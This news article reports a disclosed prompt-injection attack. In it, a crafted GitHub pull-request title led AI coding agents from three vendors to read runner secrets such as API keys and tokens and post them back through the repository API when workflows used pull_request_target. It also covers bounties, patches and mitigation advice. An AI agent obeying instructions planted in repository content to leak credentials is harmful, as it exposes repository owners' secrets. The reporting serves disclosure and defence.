AI-powered coding agents from Anthropic, Google and GitHub exposed repository secrets after a specially crafted GitHub pull-request title triggered the tools into leaking credentials, a security researcher disclosed last week.
The exploit, which required no external infrastructure, worked in cases where automated workflows used GitHub's pull_request_target trigger, a setting that injects secrets into the runner environment rather than the default pull_request configuration that avoids exposing credentials to forked repositories.
Aonan Guan and colleagues at Johns Hopkins University published the full technical disclosure under the name "Comment and Control."
The research showed the attack could read environment variables, including ANTHROPIC_API_KEY, GEMINI_API_KEY and GITHUB_TOKEN, from the runner and post them back to the repository using the platform's own API.
Anthropic, the maker of Claude, classified the vulnerability at 9.4 on the Common Vulnerability Scoring System (CVSS), rating it critical, and awarded a $100 bounty.
Google paid $1,337 for the disclosure and GitHub awarded $500.
All three companies patched the specific issues quietly, but none had issued formal Common Vulnerabilities and Exposures (CVE) entries in the National Vulnerability Database or published GitHub Security Advisories at the time of publication.
Anthropic's own system card for its Opus 4.7 model explicitly states that Claude Code Security Review is "not hardened against prompt injection," and the exploit demonstrated that the runtime environment could be used to extract secrets.
Merritt Baer, chief security officer at Enkrypt AI, a security firm, and former deputy chief information security officer at Amazon Web Services, argued that protections need to sit at the runtime level rather than the model level.
"At the action boundary, not the model boundary," Baer said.
The researchers and vendors noted that documentation has been updated in the wake of the disclosure, with Anthropic clarifying the feature's operating model.
OpenAI and Google did not respond to requests for comment by publication time.
The vulnerability highlights a growing tension in the adoption of AI coding agents, where convenience gains from automating code review and pull-request triage come with security trade-offs that many development teams may not yet fully appreciate.
Related reading
- Microsoft warns AI agents risk becoming "double agents" as it unveils security controls at RSAC
- OpenAI warns macOS users to update apps after supply chain security breach
- Anthropic's Claude Mythos faces questions over value despite strong cybersecurity scores
Security researchers and practitioners urged organisations to take immediate steps: audit continuous integration runners for exposed secrets, rotate any credentials that agents can access, restrict agent permissions to the minimum necessary, and ask vendors in writing whether their runtime-level prompt injection protections cover the specific deployment surface in use.
The disclosure adds to a mounting body of evidence that prompt injection remains one of the most pressing unresolved security challenges in deploying large language models in automated workflows.
The recap
- A prompt injection exposed secrets in three AI coding agents.
- Anthropic rated it CVSS 9.4 and paid a $100 bounty.
- Security teams should audit runners and rotate exposed credentials.